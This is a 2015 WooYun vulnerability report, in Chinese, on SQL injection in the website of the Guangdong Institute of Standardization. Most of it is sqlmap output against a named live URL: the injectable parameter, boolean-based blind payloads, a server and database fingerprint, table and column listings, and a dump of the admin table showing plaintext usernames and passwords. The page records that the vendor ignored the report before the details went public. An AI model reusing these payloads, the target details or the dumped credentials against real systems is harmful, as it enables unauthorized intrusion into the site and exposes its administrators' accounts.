当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110581

漏洞标题:广东省标准化研究院存在SQL注射导致管理密码泄露

相关厂商:广东省信息安全测评中心

漏洞作者: 路人甲

提交时间:2015-05-06 18:20

修复时间:2015-05-11 18:22

公开时间:2015-05-11 18:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

广东省标准化研究院存在SQL注射导致管理密码泄露

详细说明:

asp
的站
http://www.gdis.org.cn/label/Lstatute.asp?sign=1&code=ARG001 (GET)
我用sqlmap只跑出两个表
字典有限

sqlmap identified the following injection points with a total of 80 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9925=9925
---
sqlmap identified the following injection points with a total of 315 HTTP(s) requests:
---
Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[2 tables]
+-------+
| ics |
| usern |
+-------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: usern
[8 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| code | non-numeric |
| ics | non-numeric |
| id | numeric |
| power | non-numeric |
| state | non-numeric |
| tag | non-numeric |
| username | non-numeric |
| userpwd | non-numeric |
+----------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sign=1&code=ARG001%' AND 6690=6690 AND '%'='
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: usern
[3 entries]
+----+-----+-----+------+---------------+-------+----------+---------+
| id | tag | ics | code | power | state | username | userpwd |
+----+-----+-----+------+---------------+-------+----------+---------+
| 1 | l艕 | NULL | NULL | |疟~脽{膭t\x06TX | <blank> | admin | admin |
| 7 | l艕 | NULL | NULL | N\x00 | <blank> | sonia | sonia |
| 8 | l艕 | NULL | NULL | N\x00 | <blank> | yegong | 123456 |
+----+-----+-----+------+---------------+-------+----------+---------+

漏洞证明:

2.png


2.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-11 18:22

厂商回复:

最新状态:

暂无